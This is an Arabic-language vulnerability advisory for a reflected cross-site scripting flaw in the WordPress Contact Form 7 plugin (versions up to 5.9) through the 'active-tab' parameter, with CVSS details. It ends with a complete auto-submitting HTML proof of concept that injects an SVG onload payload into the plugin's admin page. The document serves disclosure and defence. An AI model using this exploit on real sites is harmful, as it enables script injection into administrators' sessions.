
Contact Form 7 <= 5.9 - ثغرة البرمجة النصية عبر المواقع المنعكسة (Reflected Cross-Site Scripting)
Contact Form 7 <= 5.9 - Cross-Site Scripting الانعكاسية
إن إضافة Contact Form 7 الخاصة بووردبريس معرّضة لثغرة Cross-Site Scripting الانعكاسية عبر المعامل 'active-tab' في جميع الإصدارات حتى 5.9 وما يشملها، وذلك بسبب عدم كفاية تعقيم المدخلات وهروب المخرجات. وهذا يتيح للمهاجمين غير المصادَق عليهم حقن نصوص برمجية تعسفية في الصفحات التي يتم تنفيذها إذا نجحوا في خداع المستخدم لتنفيذ إجراء مثل النقر على رابط.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
تحتاج إلى معرفة قيمة معرّف المقالة (post id) التي يوجد عليها النموذج، وإلا فلن يعمل الرابط عندما ينقر عليه المسؤول. بشكل عام، يجب أن تكون الصلاحيات المطلوبة عالية (H) لأنك تحتاج إلى أن ينقر المسؤول على الرابط.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>